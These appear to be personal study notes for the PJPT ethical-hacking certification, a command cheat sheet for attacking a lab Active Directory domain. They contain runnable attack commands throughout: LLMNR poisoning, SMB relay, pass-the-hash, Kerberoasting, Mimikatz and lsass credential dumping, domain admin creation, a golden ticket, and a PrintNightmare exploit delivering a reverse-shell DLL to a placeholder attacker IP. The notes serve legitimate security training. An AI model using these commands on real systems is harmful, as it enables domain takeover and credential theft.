PJPT Certification

PJPT Certification Notes

Overview

The PJPT certification is offered by TCM Security and comes with the Practical Ethical Hacking course. The course covers various topics from Active Directory to CVE exploitation through videos and quizzes.

Network Enumeration

Basic Network Scanning

# ARP scanning
sudo arp-scan -l
 
# Network discovery
netdiscover -r 192.168.5.0/24
 
# Comprehensive Nmap scans
nmap -T4 -p- -A 192.168.5.0/24
nmap -T4 -p- -A 192.168.5.1
nmap -T4 -p- -sS -sC 192.168.5.0/24

Active Directory Attacks

LLMNR Poisoning

1. Capture NTLMv2 hashes using Responder:

sudo responder -I tun0 -dP

2. Crack captured hashes:

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

SMB Relay Attack

Prerequisites: SMB signing must be disabled on target machines.

1. Check SMB signing status:

nmap -p445 192.168.5.0/24 --script=smb2-security-mode

2. Configure Responder:

sudo nano /etc/responder/Responder.conf
# Set:
# SMB = Off
# HTTP = Off

3. Execute relay attack:

# For hash dumping
sudo ntlmrelayx.py -tf targets.txt -smb2support
 
# For interactive shell
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
 
# For command execution
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

Shell Access Methods

PSExec

# Domain user
psexec.py test.local/fcastle:'Password1'@192.168.5.1
 
# Local user
psexec.py fcastle:'Password1'@192.168.5.1
 
# Pass-the-hash
psexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]

WMIExec

wmiexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]

SMBExec

smbexec.py test.local/fcastle:'Password1'@192.168.5.1

Metasploit PSExec

use exploit/windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2

IPv6 Attacks

When IPv6 is enabled without proper DNS configuration:

1. Start mitm6:

sudo mitm6 -d test.local

2. Configure NTLM relay:

ntlmrelayx.py -6 -t ldaps://192.168.5.1 -wh fakewpad.test.local -l lootme

Results will be saved in /home/kali/lootme/domain_computers.html

Post-Compromise Enumeration

LDAP Domain Dump

sudo ldapdomaindump ldaps://192.168.5.1 -u 'test.local\fcastle' -p Password1
firefox domain_*.html

BloodHound

1. Collect data:

sudo bloodhound-python -d test.local -u fcastle -p Password1 -ns 192.168.5.1 -c all

2. Start services:

sudo neo4j console
sudo bloodhound

PlumHound

sudo python3 PlumHound.py --easy -p [PASSWORD]
sudo python3 PlumHound.py -x tasks/default.tasks -p [PASSWORD]

Post-Compromise Attacks

Pass-the-Hash

1. Test credentials:

# With password
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1
 
# With hash
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH]

2. Dump hashes:

# Using Secretsdump
secretsdump.py test.local\fcastle:Password1@192.168.5.2
 
# Using hash
secretsdump.py administrator@192.168.5.3 --hashes [LM-HASH]:[NT-HASH]

Kerberoasting

1. Request SPN tickets:

python GetUserSPNs.py test.local/fcastle:Password1 -dc-ip 192.168.5.1 -request

2. Crack tickets:

hashcat -m 13100 SPNs-hash.txt /usr/share/wordlists/rockyou.txt

Token Impersonation

meterpreter > list_tokens -u
meterpreter > impersonate_token test\\administrator

Credential Dumping

Mimikatz

mimikatz(powershell) # privilege::debug
mimikatz(powershell) # lsadump::lsa /patch
mimikatz(powershell) # sekurlsa::logonPasswords

ProcDump

procdump.exe -accepteula -ma lsass.exe out.dmp

Domain Privilege Escalation

# Create domain user
net user /add pentester "StrongPassword123!" /domain
 
# Add to Domain Admins
net group "Domain Admins" pentester /ADD /DOMAIN

Advanced Attacks

ZeroLogon

Warning: Can cause severe domain controller damage

Test for vulnerability:

git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
python3 zerologon_tester.py DC-01 192.168.5.1

PrintNightmare

Remote Code Execution

1. Check vulnerability:

rpcdump.py @192.168.5.3 | egrep 'MS-RPRN|MS-PAR'

2. Execute attack:

# Create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=5555 -f dll > shell.dll
 
# Share payload
smbserver.py share . -smb2support
 
# Execute exploit
python3 CVE-2021-1675.py test.local/f.castle:Password1@192.168.5.2 '\\<ATTACKER-IP>\share\shell.dll'

Local Privilege Escalation

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "pentester" -NewPassword "StrongPassword123!"

Domain Takeover Techniques

NTDS.dit Extraction

secretsdump.py test.local\fcastle:Password1@192.168.5.2 -just-dc-ntlm

Golden Ticket Attack

# In Mimikatz:
privilege::debug
lsadump::lsa /inject /name:krbtgt
kerberos::golden /User:Administrator /domain:test.local /sid:S-1-5-21-3311685201-1443070845-3622335404 /krbtgt:3f5f8614cf590401df166f81b87bf17 /id:500 /ptt
misc::cmd